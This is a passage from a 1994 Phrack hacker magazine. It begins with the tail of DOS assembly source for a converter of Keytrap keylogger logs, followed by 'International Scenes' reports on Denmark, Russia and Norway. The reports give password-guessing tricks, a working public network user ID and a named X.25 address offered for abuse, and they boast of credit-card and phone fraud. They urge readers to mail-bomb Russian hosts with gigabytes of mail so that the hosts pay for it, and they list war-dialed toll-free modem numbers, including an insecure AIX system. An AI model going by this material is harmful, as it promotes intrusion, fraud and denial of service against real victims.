|||
|
cmp byte ptr [bx], 0 ;
|
|||
|
je prtuse ;
|
|||
|
;
|
|||
|
call null ;
|
|||
|
call check ;
|
|||
|
jc fprob ;
|
|||
|
;
|
|||
|
go1: call ldata ;
|
|||
|
call conv ;
|
|||
|
call sdata ;
|
|||
|
cmp last, 1 ;
|
|||
|
jne go1 ;
|
|||
|
jmp bye ;
|
|||
|
;
|
|||
|
;------------------------------------------------
|
|||
|
;
|
|||
|
null: mov bx, 81h ;
|
|||
|
null1: inc bx ;
|
|||
|
cmp byte ptr [bx], 20h ;
|
|||
|
jnz null1 ;
|
|||
|
mov byte ptr [bx], 0 ;
|
|||
|
;
|
|||
|
mov outoffset, bx ;
|
|||
|
inc word ptr [outoffset] ;
|
|||
|
;
|
|||
|
null2: inc bx ;
|
|||
|
cmp byte ptr [bx], 0Dh ;
|
|||
|
jnz null2 ;
|
|||
|
mov byte ptr [bx], 0 ;
|
|||
|
ret ;
|
|||
|
;
|
|||
|
;------------------------------------------------
|
|||
|
;
|
|||
|
check: mov ax, 3D00h ;
|
|||
|
mov dx, 82h ;
|
|||
|
int 21h ;
|
|||
|
jc check2 ;
|
|||
|
mov bx, ax ;
|
|||
|
mov ah, 3Eh ;
|
|||
|
int 21h ;
|
|||
|
jc check2 ;
|
|||
|
;
|
|||
|
mov ah, 3Ch ;
|
|||
|
xor cx, cx ;
|
|||
|
mov dx, outoffset ;
|
|||
|
int 21h ;
|
|||
|
jc check2 ;
|
|||
|
mov bx, ax ;
|
|||
|
mov ah, 3Eh ;
|
|||
|
int 21h ;
|
|||
|
jc check2 ;
|
|||
|
;
|
|||
|
clc ;
|
|||
|
check2: ret ;
|
|||
|
;
|
|||
|
;------------------------------------------------
|
|||
|
;
|
|||
|
ldata: mov ax, 3D00h ;
|
|||
|
mov dx, 82h ;
|
|||
|
int 21h ;
|
|||
|
mov inhandle, ax ;
|
|||
|
;
|
|||
|
mov ax, 4200h ;
|
|||
|
mov bx, inhandle ;
|
|||
|
mov cx, inpointH ;
|
|||
|
mov dx, inpointL ;
|
|||
|
int 21h ;
|
|||
|
;
|
|||
|
mov ah, 3Fh ;
|
|||
|
mov bx, inhandle ;
|
|||
|
mov cx, 60000 ;
|
|||
|
lea dx, eof ;
|
|||
|
int 21h ;
|
|||
|
mov loaded, ax ;
|
|||
|
cmp ax, 60000 ;
|
|||
|
je ldata2 ;
|
|||
|
mov last, 1 ;
|
|||
|
;
|
|||
|
ldata2: mov ax, 4201h ;
|
|||
|
mov bx, inhandle ;
|
|||
|
xor cx, cx ;
|
|||
|
xor dx, dx ;
|
|||
|
int 21h ;
|
|||
|
mov inpointH, dx ;
|
|||
|
mov inpointL, ax ;
|
|||
|
;
|
|||
|
mov ah, 3Eh ;
|
|||
|
mov bx, inhandle ;
|
|||
|
int 21h ;
|
|||
|
ret ;
|
|||
|
;
|
|||
|
;------------------------------------------------
|
|||
|
;
|
|||
|
conv: mov cx, loaded ;
|
|||
|
lea si, eof ;
|
|||
|
;
|
|||
|
conv1: lea di, table ;
|
|||
|
;
|
|||
|
cmp cx, 0 ;
|
|||
|
je conv6 ;
|
|||
|
;
|
|||
|
mov al, byte ptr [si] ;
|
|||
|
conv2: mov ah, byte ptr [di] ;
|
|||
|
cmp ah, 0 ;
|
|||
|
je conv4 ;
|
|||
|
cmp ah, al ;
|
|||
|
je conv3 ;
|
|||
|
add di, 2 ;
|
|||
|
jmp conv2 ;
|
|||
|
;
|
|||
|
conv3: inc di ;
|
|||
|
mov al, byte ptr [di] ;
|
|||
|
mov byte ptr [si], al ;
|
|||
|
dec cx ;
|
|||
|
inc si ;
|
|||
|
jmp conv1 ;
|
|||
|
;
|
|||
|
conv4: mov byte ptr [si], 20h ;
|
|||
|
dec cx ;
|
|||
|
inc si ;
|
|||
|
jmp conv1 ;
|
|||
|
;
|
|||
|
conv6: ret ;
|
|||
|
;
|
|||
|
;------------------------------------------------
|
|||
|
;
|
|||
|
sdata: mov ax, 3D02h ;
|
|||
|
mov dx, outoffset ;
|
|||
|
int 21h ;
|
|||
|
mov outhandle, ax ;
|
|||
|
;
|
|||
|
mov ax, 4202h ;
|
|||
|
mov bx, outhandle ;
|
|||
|
xor cx, cx ;
|
|||
|
xor dx, dx ;
|
|||
|
int 21h ;
|
|||
|
;
|
|||
|
mov ah, 40h ;
|
|||
|
mov bx, outhandle ;
|
|||
|
mov cx, loaded ;
|
|||
|
lea dx, eof ;
|
|||
|
int 21h ;
|
|||
|
;
|
|||
|
mov ah, 3Eh ;
|
|||
|
mov bx, outhandle ;
|
|||
|
int 21h ;
|
|||
|
ret ;
|
|||
|
;
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
|
|||
|
namver db 10,13
|
|||
|
db 'CONVERT v1.0',10,13
|
|||
|
db 'Keytrap logfile converter.',10,13
|
|||
|
db 'By Dcypher (Dcypher@aol.com)',10,13
|
|||
|
db 10,13,'$'
|
|||
|
|
|||
|
usage db 'Usage: CONVERT logfile outfile',10,13
|
|||
|
db 10,13
|
|||
|
db ' logfile - Keytrap',27h,'s scancode data.',10,13
|
|||
|
db ' outfile - Specify an output file name.',10,13
|
|||
|
db 10,13,'$'
|
|||
|
|
|||
|
ferr db 'WARNING: Problem with one of the files.',10,13
|
|||
|
db 10,13,'$'
|
|||
|
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
|
|||
|
eof db 0
|
|||
|
end start ==Phrack Magazine==
|
|||
|
|
|||
|
Volume Five, Issue Forty-Six, File 27 of 28
|
|||
|
|
|||
|
****************************************************************************
|
|||
|
|
|||
|
International Scenes
|
|||
|
|
|||
|
There was once a time when hackers were basically isolated. It was
|
|||
|
almost unheard of to run into hackers from countries other than the
|
|||
|
United States. Then in the mid 1980's thanks largely to the
|
|||
|
existence of chat systems accessible through X.25 networks like
|
|||
|
Altger, tchh and QSD, hackers world-wide began to run into each other.
|
|||
|
They began to talk, trade information, and learn from each other.
|
|||
|
Separate and diverse subcultures began to merge into one collective
|
|||
|
scene and has brought us the hacking subculture we know today. A
|
|||
|
subculture that knows no borders, one whose denizens share the common goal
|
|||
|
of liberating information from its corporate shackles.
|
|||
|
|
|||
|
With the incredible proliferation of the Internet around the globe, this
|
|||
|
group is growing by leaps and bounds. With this in mind, we want to help
|
|||
|
further unite the communities in various countries by shedding light
|
|||
|
onto the hacking scenes that exist there. If you want to contribute a
|
|||
|
file about the hacking scene in your country, please send it to us
|
|||
|
at phrack@well.com.
|
|||
|
|
|||
|
This month we have files about the scenes in Denmark and Russia, updates
|
|||
|
from Australia and Argentina, and a scan of Norway's toll-free exchange.
|
|||
|
|
|||
|
________________________________________________________________________________
|
|||
|
|
|||
|
|
|||
|
The Computer Underground in Denmark
|
|||
|
|
|||
|
|
|||
|
Dear Phrack Readers, what follows is a little about the Danish
|
|||
|
computer underground, focusing on the hacking/phreaking scene.
|
|||
|
|
|||
|
A little introduction:
|
|||
|
|
|||
|
Even though Denmark itself is little country, with a little over 5 million
|
|||
|
citizens, an active computer underground community thrives upon the growing
|
|||
|
network links and computer systems which in these days seems to pop up all
|
|||
|
over country.
|
|||
|
|
|||
|
The history of the hacking community in DK is not very old, but since the
|
|||
|
first Danish hackers appeared some 5 years ago, there has been increasing
|
|||
|
hacking activity, bringing on a history of busts, paranoia and times of war;
|
|||
|
but also a history of great friendships, supremacy over the corporate machine,
|
|||
|
and a process of learning more about the world we live in. But before we take
|
|||
|
a look at the networks, boards and the community itself, let's go back in time,
|
|||
|
and find the place where it all started.
|
|||
|
|
|||
|
The Past:
|
|||
|
|
|||
|
The first hackers to appear in DK was JubJub Bird and Sprocket, two high
|
|||
|
school students which broke into 100's of computers world wide. At that time
|
|||
|
there was no H/P scene in DK, no boards, no HP networks and no fellow hackers.
|
|||
|
Nevertheless, JubJub's role in the Danish HP history plays a key role. JubJub
|
|||
|
got busted early January '90, after being discovered in some of NASA's non
|
|||
|
public machinery, and being under surveillance for a period of time. This was
|
|||
|
the beginning of what was to become the Danish hacking scene. JubJub and
|
|||
|
Sprocket never got a sentence, since the court had absolutely no idea of how
|
|||
|
to handle a case like this. The court sat down a period of 2 years, and if
|
|||
|
JubJub or Sprocket was caught in hacking within that period they would
|
|||
|
get a verdict.
|
|||
|
|
|||
|
Anyway, after the bust of JubJub and Sprocket, the first stirs of hackers
|
|||
|
appeared and began to expand like rings in water. And suddenly we had a growing
|
|||
|
happy hacking community. Hackers from all over the country gathered at newly
|
|||
|
started 'HPA only boards' which was a rarely seen thing among the sea of WaReZ
|
|||
|
boards. One of the coolest boards was Fantasia, the headquarters of MoTIGoL,
|
|||
|
which was being run by Netrunner. Fantasia was the largest in Denmark, maybe
|
|||
|
even in Scandinavia, and had callers from all over the world. At that time,
|
|||
|
nobody was afraid of getting busted, and A LOT of BlueBoxing, X25, and general
|
|||
|
hacking on Inet was done. But one day all that changed.
|
|||
|
|
|||
|
During the winter '91 DIKU (Institute of computer science, Copenhagen
|
|||
|
university) was used as a meeting place of hackers. A lot of novice hackers
|
|||
|
used the machines to learn about Internet and UNIX in general, skating through
|
|||
|
the internet, trading info, chatting at IRC and stuff like that. What nobody
|
|||
|
knew was that Jgen Bo Madsen, security expert and high paid consultant
|
|||
|
working for UNI*C, was monitoring all traffic from and off DIKU, with evil
|
|||
|
intentions of busting! The law enforcement specter was soon to cast its dark
|
|||
|
shadow on the whole of the Danish scene.
|
|||
|
|
|||
|
It all ended one winter afternoon. I remember turning on the TV, not really
|
|||
|
paying attention to the news, reading a book or so, when suddenly the news
|
|||
|
lady starts speaking about how the secret service is soon to unravel the biggest
|
|||
|
hacker conspiracy ever in Denmark, one hacker was already arrested and 10 more
|
|||
|
would be arrested in near future. Saron was the one who got busted. He had used
|
|||
|
an x25 datapak link, which normally only was used for electronic mail, to
|
|||
|
access DIKU, coming in from a German PAD to make tracing harder, but also
|
|||
|
making a hell of a big bill for the stolen NUI's owner. Anyway, it came out
|
|||
|
that JBM (Jgen Bo Madsen) had traced 76 calls to DIKU, and had monitored the
|
|||
|
breakins of computers in Greece, Brazil, Mexico and USA.
|
|||
|
|
|||
|
At that moment the entire scene more or less panicked. Most dudes moved
|
|||
|
their precious machinery out of the house and all boards closed down.
|
|||
|
A period of isolation began. The SysOp of Fantasia, Netrunner pulled out his
|
|||
|
harddisk hiding it somewhere out of reach, if JBM and his secret service
|
|||
|
buddies should show up.
|
|||
|
|
|||
|
No more busts happened and people calmed down after a month or so. Everybody
|
|||
|
knew that things wouldn't be the same after the DIKU incident. Netrunners
|
|||
|
harddisk broke down after he had reinstalled it, because all the dirt it
|
|||
|
had consumed from 2 years constant running, was too much for the thing to
|
|||
|
handle when it was powered back on. So, Fantasia closed and the underground
|
|||
|
network PhoenixNet also closed when it came out that JBM had infiltrated
|
|||
|
the net. An era was over, and a new was to begin.
|
|||
|
|
|||
|
|
|||
|
The Present:
|
|||
|
|
|||
|
Today's scene is doing quite good. It has became harder in a way, more
|
|||
|
careful and more closed than ever. But still, we have open boards
|
|||
|
and a public network. FOOnet which focuses on computer security and is
|
|||
|
used as an forum open for discussions. Mostly by hackers and people into
|
|||
|
computer security in general, but every once in awhile JBM and Sysadm's
|
|||
|
drop by too. Also, the Danish scene is proud to release CrackerJack, made by
|
|||
|
Jackal, which we still claim is the fastest UNIX passwd cracker available for
|
|||
|
PC. Not that cracking passwd files is a major element in hacking, but its nice
|
|||
|
to have a fast cracker every once in awhile :)
|
|||
|
|
|||
|
The Danish computer underground scene is filled with WaReZ boards,
|
|||
|
but only a few real H/P/A boards are running. Boards like Free Speech Inc.
|
|||
|
and Freeside are places where the Danish hackers hang out. None of these
|
|||
|
boards are public, but JBM is quite aware of them and had once infiltrated
|
|||
|
Freeside, even though it was clearly stated that the bbs was private and
|
|||
|
no one related to any gov agencies was allowed to use the board. So, JBM
|
|||
|
is actually doing what he has accused us for over the years, which is
|
|||
|
intruding people's privacy.
|
|||
|
|
|||
|
Other than FOOnet, there is a few other networks, such as SDC which
|
|||
|
once had a good mail flow in the hacking conferences, but today more
|
|||
|
is turning into a demo/warez net. A few other truly H/P nets are running
|
|||
|
successful with a good mail flow, but those shall remain anonymous in
|
|||
|
this article.
|
|||
|
|
|||
|
The links from the Danish scene to fellow hackers around the world is
|
|||
|
very good. Due to numerous nights spent at QSD, connections is established
|
|||
|
to a lot of dudes in Brazil which frequently drops by Free Speech Inc. and
|
|||
|
Freeside, dudes in UK as well as fellow hackers in US like Alby/Empire.
|
|||
|
|
|||
|
Okay, this is it. The section about hacking in Denmark. The stuff
|
|||
|
that you had to read all the above boring shitty sentimental stuff,
|
|||
|
to get to!!
|
|||
|
|
|||
|
|
|||
|
Hacking in Denmark:
|
|||
|
|
|||
|
The two main networks in DK which is used for hacking and meeting fellow
|
|||
|
hackers are, (of course) Internet and the X25 datapak link. Internet is
|
|||
|
accessible via all Universities like diku.dk, daimi.aau.dk, auc.dk and so on.
|
|||
|
(Nobody uses DIKU anymore though). The university is doing a brave struggle
|
|||
|
to keep the hackers out by upgrading to C2 passwd security, meaning that
|
|||
|
passwds must be at least 8 chars, contain 1 uppercase and 1 non alphabetic
|
|||
|
char.
|
|||
|
|
|||
|
The upper level of the top 10 of chosen C2 security passwd's goes something
|
|||
|
like: q1w2e3r4*, a1s2d3f4*, these do not contain any uppercase chars and
|
|||
|
therefore should not have been accepted as a passwd by the system, but
|
|||
|
apparently the C2 software finds them secure. Also, a nice thing to do is
|
|||
|
taking your wordlist and using Therion's Passwd Utility, TPU which is a word
|
|||
|
list manipulator, and add a 1* to all words in the list and uppercase the first
|
|||
|
letter. Gives a lot of accounts.
|
|||
|
|
|||
|
Another popular thing, in order to keep hackers out, is to setup a so-called
|
|||
|
'modem security password' on all dialups. So when you call up the system,
|
|||
|
before you ever get to the server you have to enter a password. And if you get
|
|||
|
through, not all accounts are cleared to use the modem dialup facilities,
|
|||
|
and unless you've got your sleazy hands on a cleared account, you get the boot.
|
|||
|
|
|||
|
Even though the universities puts such a great effort into keeping
|
|||
|
hackers out, they aren't doing very good. In fact, they are doing real
|
|||
|
bad. A legit account costs appr. 1900 dkr, which is about a little over
|
|||
|
300$ US., which goes into the pockets of UNI*C, so its no wonder that
|
|||
|
we like to use the nice free facilities present at the universities.
|
|||
|
|
|||
|
Other ways to get on Internet, are via other machines under the ministry
|
|||
|
of education and certain private and government systems. It's surprising
|
|||
|
how many bugs (that we all know of) in certain UNIX versions, that still
|
|||
|
have not been patched, and therefore leave the systems wide open.
|
|||
|
This goes not only for Denmark, but generally throughout machines on Internet
|
|||
|
in Europe. Also, a well known phenomena in DK throughout the sector of
|
|||
|
private corporation computer systems, is lousy security. Elementary
|
|||
|
stuff like bad file permissions, left over suid shell scripts, and
|
|||
|
open guest accounts are everywhere.
|
|||
|
|
|||
|
Regarding the X25 datapak links. The official Danish PAD can be
|
|||
|
reached at dialup 171. This is totally free number just like 80xxxxxx
|
|||
|
are, which doesn't affect your phone bill. Keep in mind that all calls made in
|
|||
|
DK are billed, even local calls within same city are charged, and charged
|
|||
|
high! I remember a time when I was kind of addicted to a certain MUD. For one
|
|||
|
month alone I got a bill on 1800 dkr, appr. 300 US$! So, the 171 X25 link is
|
|||
|
nice thing, since all calls are billed to the owner of the Network User Id
|
|||
|
(NUI) and NOT on your phone bill.
|
|||
|
|
|||
|
However, X25 can be a dangerous thing to use. Especially if you only
|
|||
|
have a single NUI to use. The phone company is having some trouble tracing
|
|||
|
the 171, but all calls made in DK on digital lines are logged. So, when
|
|||
|
some corporation gets a bill on, say 2-3000$ or an amount much higher
|
|||
|
than usual, the phone company can compare the logs on who dialed 171,
|
|||
|
to the X25 logs, on which date and time the NUI in question was abused,
|
|||
|
and figure out who abused the NUI. On analog lines the logging is
|
|||
|
harder to do, and only goes back a month or so. The format of the NUIs
|
|||
|
consist of a user number and a password. The first char indicates
|
|||
|
either a K or J, depending on the NUI's owner, either located under KTAS
|
|||
|
or JTAS districts. Jutland is covered by JTAS and Copenhagen Sjlland,
|
|||
|
by KTAS. Then follows 7 or 8 numbers and usually a word of 7-8 chars. Like,
|
|||
|
K0100872DKDIANEC, this is a valid NUI open for public use by everybody,
|
|||
|
but its restricted to only to connect to a specific system. Sum lame
|
|||
|
menu database thing. Most NUI's allows access to most computers, world
|
|||
|
wide on the X25 network, by an NUA (network User Address). The most use
|
|||
|
of X25 is to gain free access to Internet by connecting to a PAD which
|
|||
|
allows telnet. Most of the telnet PAD's has been closed recently because
|
|||
|
of an increasing (ab)use. However, there is still sites like isosun-t.
|
|||
|
ariadne.gr which carries an X25 PAD, and because the sysadm there comes off
|
|||
|
like a dick and is a jerk I'll give u all his NUA. Its 020233181282010. Also,
|
|||
|
check out gw.sdbs.dk, carries a 9k6 x25 link as well as normal Inet axx.
|
|||
|
|
|||
|
|
|||
|
A few people to mention, who either has or is playing an important
|
|||
|
part of the Danish hacking community:
|
|||
|
|
|||
|
JubJub Bird, Sprocket, Saron, Ravan, Netrunner / Sense/NET, Descore, WedLock,
|
|||
|
Le Cerveau, Parrot-Ice, Jackal, Temp, Therion, and myself I guess... :)
|
|||
|
|
|||
|
If u like, check out:
|
|||
|
|
|||
|
Free Speech Inc. (+45) 4 582 5565 SysOp: NiteCrawler
|
|||
|
Freeside (+45) 3 122 3119 -"- : Descore (Off. CJ Dist. site.)
|
|||
|
|
|||
|
This is it. Hope u enjoyed this little file. We are always happy to
|
|||
|
meet foreign hackers, so call one of the above boards and lets exchange
|
|||
|
accou.. ehh... intercultural hacking research information :)
|
|||
|
|
|||
|
-----------------------------------------------------------------------------
|
|||
|
|
|||
|
|
|||
|
Why would you or why wouldn't you want
|
|||
|
to hack in the ex-USSR or in other words
|
|||
|
what the hell do we do up here.
|
|||
|
|
|||
|
By Digital Empiror and Stupid Fucker
|
|||
|
|
|||
|
Russia is a great country, with absolutely no laws against hacking or
|
|||
|
phreaking, both are very easy to do and get away with. It's for that
|
|||
|
reason, that most of the famous online services like CompuServe and Delphi
|
|||
|
closed registrations coming out of the biggest country in the world via
|
|||
|
SprintNet, (you guys think we still can't get in? ... take that as a hint).
|
|||
|
If some great telephone company installed a payphone that can charge calls
|
|||
|
onto a credit card (very rare in this country) then we can use it as well,
|
|||
|
credit card numbers are not hard to compile, especially if you know that
|
|||
|
it is not really illegal. What about those great cellular telephones, you
|
|||
|
know, we love to use those for free, (can't you guys get it? we know that
|
|||
|
we are pain in the ass, but LIVE WITH IT!).
|
|||
|
|
|||
|
Most of our switchboards in Russia are very ancient, screwed up
|
|||
|
relay-analog switches, they don't have methods for protocol-ing
|
|||
|
telephone calls and present undependable methods for identifying telephone
|
|||
|
numbers. Also there is special equipment which allows making it impossible
|
|||
|
to detect your phone number, or even making detection equipment mistake your
|
|||
|
phone number. Interstate switchboards have to have special methods of
|
|||
|
detecting your phone number, which are of course only accessible to
|
|||
|
Interstate switchboards and not to the rest of commercial companies. There
|
|||
|
was a case once were SprintNet caught one of our great hackers, but he had
|
|||
|
sent them to his great grandfather's (wanna try doing that with the
|
|||
|
FBI?) because as he said 'You can't really be sure that it was really ME
|
|||
|
calling since in this country you can't rely on your number detection
|
|||
|
equipment...'
|
|||
|
|
|||
|
Another great thing is how the networks are set up in Russia. The greatest
|
|||
|
and the biggest X.25 network is of course SprintNet (for which they have to
|
|||
|
pay of course, if not them then somebody else...), it's a little slow here,
|
|||
|
but that's OK. The administrators who set up the PADs are very lame and
|
|||
|
stupid, and of course can't set up their PADs like SprintNet would want
|
|||
|
them to. They can, for example, they were setting up their PAD so, that it
|
|||
|
would let you connect with virtually ANY system without asking for a NUI,
|
|||
|
and even when they detected, that hackers do it, they couldn't do anything
|
|||
|
besides changing their PAD instead of just changing one register!
|
|||
|
|
|||
|
Besides that, their is no problem with finding a NUI for Russian X.25
|
|||
|
networks, most of them don't support collect calls like SprintNet, so most
|
|||
|
Russian services that would like their customers to access their service
|
|||
|
via X.25 give the users a unique NUI, that specifies that they can only
|
|||
|
access THIS service, but they usually forget to set it up right so the
|
|||
|
stupid customers like another of our great hackers, will instead of getting
|
|||
|
charged for the service, go to an outdial and call his favorite BBS in
|
|||
|
Clearwater, FL for an example (do they have boards there?). I don't know
|
|||
|
if you like to access CitiBank machines from SprintNet, but we love to do
|
|||
|
stuff like that. For example, recently we found a lone standing computer,
|
|||
|
I don't think the guys in CitiBank really understood what they were doing
|
|||
|
when they left their modem setup option on that machine without a password,
|
|||
|
it was a pleasure to change their modem strings knowing that it's absolutely
|
|||
|
legal to do so and nobody has even a right to call about it! Also there
|
|||
|
are Internet providers in Russia, only two, from which only one is
|
|||
|
interesting - RELCOM! Most of Internet in Russia is done via UUCP and
|
|||
|
costs a bundle of money, so if I am in a bad mood, I'll drop 10-20 megs of
|
|||
|
mail into an address that doesn't exist, and will laugh and you know why?
|
|||
|
In RELCOM, everybody pays the central router - KIAE.SU, so if you send megs
|
|||
|
of stuff, it will go through a lot of systems that will have to pay first
|
|||
|
each other then to KIAE.SU, but there will be THE last system, that will
|
|||
|
say 'ya know? there is no such address!', so then the trouble will start.
|
|||
|
So if you are in a bad mood, then please, do us a favor, drop a gig or 2 to
|
|||
|
machine that does not have an IP address, better for it to go via a few of
|
|||
|
those machines, for example, to be original:
|
|||
|
|
|||
|
kaija.spb.su!arcom.spb.su!<any machine in USA>!kiae.su!kaija.spb.su!root
|
|||
|
|
|||
|
I am sure if you have NSLOOKUP, you can be original and make your best
|
|||
|
route via a dozen systems. When doing it, you can be sure, that it will
|
|||
|
call a lot of arguments from every one of that dozen concerning to who will
|
|||
|
pay for that gig (1mb of mail in Russia costs $50 - $150, that enough money
|
|||
|
for poor Russian Internet hosts).
|
|||
|
|
|||
|
It's all really great, but we are all on our own, and are not organized into a
|
|||
|
group. There are not many of us and we are not known by any of our western
|
|||
|
colleagues, to contact us, mail us at:
|
|||
|
|
|||
|
an58736@anon.penet.fi
|
|||
|
|
|||
|
-----------------------------------------------------------------------------
|
|||
|
PhreeFone Numbers in Norway
|
|||
|
Research and Norwegian Edition by
|
|||
|
|
|||
|
cyber aktiF (01-Feb-94)
|
|||
|
|
|||
|
English Translation by Codex/DBA (26-Apr-1994)
|
|||
|
-----------------------------------------------------------------------------
|
|||
|
|
|||
|
DISCLAIMER: The author of this document takes no responsibility as to how
|
|||
|
the information herein is used. I hope everyone who uses this
|
|||
|
information use it for inquisitive purposes only, and don't
|
|||
|
use it for ANY destructive purposes whatsoever.
|
|||
|
|
|||
|
WARNING: Unauthorized use of PBX and other communications equipment
|
|||
|
owned by others, be it private or business, is illegal and may
|
|||
|
result in banishment from the Norwegian telephone company (Tele-
|
|||
|
verket) and/or punishment by law.
|
|||
|
|
|||
|
---
|
|||
|
|
|||
|
After many sporadic travels over the phone network, in other words scanning
|
|||
|
the number region 800 3xxxx, I've come across several interesting things. I
|
|||
|
therefore thought it was in its right place to make a complete list of which
|
|||
|
numbers have a carrier and which have not. The carriers only apply to modems.
|
|||
|
Televerket has (currently) allocated the region 800 30000 to 800 3500 for
|
|||
|
these services.
|
|||
|
|
|||
|
These lines are 100% phreefone, which means that the owner of these services
|
|||
|
pays for the conversation plus a surcharge per unit. This allows for long
|
|||
|
permutations of numbers and passwords without adding to your own phone bill.
|
|||
|
On the other hand, the owner of the line will have a phonebill which equals
|
|||
|
American Express's.
|
|||
|
|
|||
|
Televerket and/or the company/person supplying the service(s) have NO problem
|
|||
|
finding out what the caller's number is. This is regardless whether or not
|
|||
|
you have filled in the "don't reveal my number to those I call" part of
|
|||
|
Televerket's connection form/document. Therefore, nosing around these numbers
|
|||
|
should be done with some care.
|
|||
|
|
|||
|
I haven't tried blueboxing 800 numbers (too much work for something which is
|
|||
|
free in the first place), but theoretically it is possible. [Codex: Would
|
|||
|
this lessen the number identification risk?]
|
|||
|
|
|||
|
I had severe difficulties with a number which answered with an 1800Hz tone
|
|||
|
in 1 second, after which it became silent. This box phoned me in intervals
|
|||
|
of 5 minutes from 12:00 the next day -- in other words, an automatic
|
|||
|
WarDial :/. If you discover the same problem, the following solution is
|
|||
|
a guaranteed success: Program your local trunk to send all incoming calls
|
|||
|
to ANOTHER number which answers with an 1800Hz tone. Let this be active an
|
|||
|
hour's time, and you should be rid of it.
|
|||
|
|
|||
|
- MODEM -
|
|||
|
|
|||
|
The list of numbers where modem carriers are commented with a single line. I
|
|||
|
haven't (at the time of writing) done a deeper investigation of any of the
|
|||
|
services, so none of them should be inactive.
|
|||
|
|
|||
|
There are several interesting things -- especially the gateways and the
|
|||
|
X.25 PAD. Please note that the security at most of the systems are pretty
|
|||
|
good. Obscure terminal types, data locks and systems which won't identify
|
|||
|
themselves are the most common types. Someone has done a good job in making
|
|||
|
the system safe from unauthorized sources. However, as said before,
|
|||
|
phreefone numbers can be exposed to attacks and permutations of zimmering
|
|||
|
quantities.
|
|||
|
|
|||
|
When I had a look at the unidentified services, the best way to connect was
|
|||
|
using a raw-mode tty which won't accept special characters. If you run a
|
|||
|
cooked-mode terminal, the text will become even more unreadable.
|
|||
|
|
|||
|
-- Modem carrier tones ------------------------------------------------------
|
|||
|
|
|||
|
80030004 - Data Lock (1)
|
|||
|
80030010 - *no output*
|
|||
|
80030067 - *no output*
|
|||
|
80030068 - Courier ASCII Dev. adapter
|
|||
|
80030078 - Courier ASCII Dev. adapter
|
|||
|
80030095 - Modem Outdial (password)
|
|||
|
80030115 - *no output*
|
|||
|
80030130 - *uknown*
|
|||
|
80030180 - *uknown*
|
|||
|
80030225 - *no output*
|
|||
|
80030301 - *no output*
|
|||
|
80030404 - *unknown* - prompts @ter
|
|||
|
80030456 - *unknown* - terminal
|
|||
|
80030485 - *unknown*
|
|||
|
80030456 - Data Lock 4000 (1)
|
|||
|
80030514 - garbage - password
|
|||
|
80030606 - *no output*
|
|||
|
80031040 - *no output*
|
|||
|
80031065 - *no output*
|
|||
|
80031315 - IBM Aix v3 RISC system/6000 (2)
|
|||
|
80031470 - garbage
|
|||
|
80031490 - Dr V.Furst. Med. Lab
|
|||
|
80031666 - prompts - @ter
|
|||
|
80031815 - prompts - <
|
|||
|
80031920 - *unknown* - password
|
|||
|
80031950 - *unknown* - hangup after 5 seconds
|
|||
|
80032165 - Dr V.Furst. Med. Lab
|
|||
|
80032340 - *uknown*
|
|||
|
80032410 - Wangvs VAX/VMS
|
|||
|
80032470 - *no output*
|
|||
|
80032480 - Perle Model 3i - V 02.00G - Apotekernes F. Innkj
|
|||
|
80032590 - *unknown* - password
|
|||
|
80032635 - *unknown* - terminal
|
|||
|
80033338 - TSS Gateway (3)
|
|||
|
80033443 - *no output*
|
|||
|
80033490 - *no output*
|
|||
|
80033580 - *unknown* - hangup after 5 seconds
|
|||
|
80033601 - *no output*
|
|||
|
80033620 - TIU Gateway (3)
|
|||
|
80033720 - *no output*
|
|||
|
80033815 - *unknown* - hangup after 5 seconds
|
|||
|
80033914 - *unknown* dumps lots of texts [Codex: What type?]
|
|||
|
80034248 - *unknown* - prompts for login
|
|||
|
80034866 - X.25 PAD
|
|||
|
|
|||
|
(1) DATA LOCK
|
|||
|
If someone can get into one of these, he/she can look forward to getting
|
|||
|
a Nobel prize. Data locks are modem front-end protectors, almost
|
|||
|
impossible to crack without physical access.
|
|||
|
|
|||
|
(2) IBM AIX
|
|||
|
AIX is one of the best flavors of UNIX there is (even though it was
|
|||
|
made by IBM) -- unfortunately the security at this site was so terrible
|
|||
|
that anyone with a minimal knowledge of UNIX and access to this machine
|
|||
|
could pull it apart blindfolded (making the life really unpleasant for
|
|||
|
the estate agents who own the LAN. Write me for an account ;).
|
|||
|
|
|||
|
(3) GATEWAYS
|
|||
|
Free internet access within grasping distance if you can break through.
|
|||
|
Not easy, but possible. ;) I am already working on it, so I'm not sure
|
|||
|
how long it will take until they increase the security.
|
|||
|
|
|||
|
[Codex: Comment about Study-By-Byte removed, as I didn't know what to call
|
|||
|
the school in English ;). Another fact was that since no number was provided,
|
|||
|
and little seemed to be gained by access to this site anyway, I figured it
|
|||
|
wasn't too important. Get hold of cyb3rF is you really think it's needed.]
|
|||
|
|
|||
|
-- End of modem carrier listing ---------------------------------------------
|
|||
|
|
|||
|
- VOICE/PBX/FAX -
|
|||
|
|
|||
|
Here, ladies and gentlemen, is the list of all the phones in the 800 3xxxx
|
|||
|
region which answer. Which is what, I'll leave up all you people out there.
|
|||
|
I have mapped some of the list, but won't spread it [Codex: Yet? ;)].
|
|||
|
|
|||
|
Only one number per line is noted down. This is to easy the job for everyone
|
|||
|
who's going to (and you will try ;) run these numbers through their scanner
|
|||
|
scripts on the lookout for PBX's and other oddities.
|
|||
|
|
|||
|
Good luck guys!
|
|||
|
|
|||
|
cyber aktiF - 01/02/94
|
|||
|
|
|||
|
-- Answering 800 3xxxx services ---------------------------------------------
|
|||
|
|
|||
|
80030000
|
|||
|
80030001
|
|||
|
80030002
|
|||
|
80030003
|
|||
|
80030005
|
|||
|
80030006
|
|||
|
80030007
|
|||
|
80030008
|
|||
|
80030009
|
|||
|
80030011
|
|||
|
80030012
|
|||
|
80030014
|
|||
|
80030015
|
|||
|
80030016
|
|||
|
80030017
|
|||
|
80030018
|
|||
|
80030019
|
|||
|
80030022
|
|||
|
80030023
|
|||
|
80030024
|
|||
|
80030025
|
|||
|
80030027
|
|||
|
80030028
|
|||
|
80030029
|
|||
|
80030030
|
|||
|
80030032
|
|||
|
80030033
|
|||
|
80030035
|
|||
|
80030036
|
|||
|
80030037
|
|||
|
80030043
|
|||
|
80030044
|
|||
|
80030045
|
|||
|
80030046
|
|||
|
80030048
|
|||
|
80030050
|
|||
|
80030051
|
|||
|
80030053
|
|||
|
80030055
|
|||
|
80030057
|
|||
|
80030058
|
|||
|
80030060
|
|||
|
80030065
|
|||
|
80030066
|
|||
|
80030070
|
|||
|
80030071
|
|||
|
80030072
|
|||
|
